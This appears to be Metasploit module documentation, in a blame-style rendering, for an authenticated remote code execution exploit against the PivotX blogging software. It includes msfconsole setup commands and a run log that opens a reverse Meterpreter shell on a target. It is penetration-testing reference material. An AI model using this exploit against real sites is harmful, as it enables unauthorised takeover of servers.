2025-07-21 12:41:38 +02:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.
|
|
|
|
|
It's written in PHP and uses MySQL or flat files as a database.
|
|
|
|
|
|
|
|
|
|
Install steps:
|
|
|
|
|
|
|
|
|
|
1. Install Apache2, MySQL, PHP8.2+
|
|
|
|
|
1. `git clone https://github.com/pivotx/PivotX.git`
|
|
|
|
|
1. Move `PivotX` to webfolder
|
2025-07-24 12:19:47 +02:00
|
|
|
1. Run the following from the web folder `sudo chown -R www-data:www-data ./`
|
2025-07-21 12:41:38 +02:00
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the application
|
|
|
|
|
1. Start msfconsole
|
|
|
|
|
1. Do: `use exploit/linux/http/pivotx_rce`
|
|
|
|
|
1. Do: `set USERNAME [PivotX username]`
|
|
|
|
|
1. Do: `set PASSWORD [PivotX password]`
|
|
|
|
|
1. Do: `set RHOSTS [target IP]`
|
|
|
|
|
1. Do: `set LHOST [attacker IP]`
|
|
|
|
|
1. Do: `run`
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
### USERNAME
|
|
|
|
|
|
|
|
|
|
PivotX username.
|
|
|
|
|
|
|
|
|
|
### PASSWORD
|
|
|
|
|
|
|
|
|
|
PivotX password.
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf exploit(linux/http/pivotx_rce) > run verbose=true
|
|
|
|
|
[*] Started reverse TCP handler on 192.168.168.128:4444
|
|
|
|
|
[*] Sending stage (40004 bytes) to 192.168.168.146
|
|
|
|
|
[*] Meterpreter session 4 opened (192.168.168.128:4444 -> 192.168.168.146:40562) at 2025-07-18 14:20:03 +0200
|
|
|
|
|
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : ubuntu
|
|
|
|
|
OS : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
|
|
|
|
|
Meterpreter : php/linux
|
|
|
|
|
|
|
|
|
|
```
|
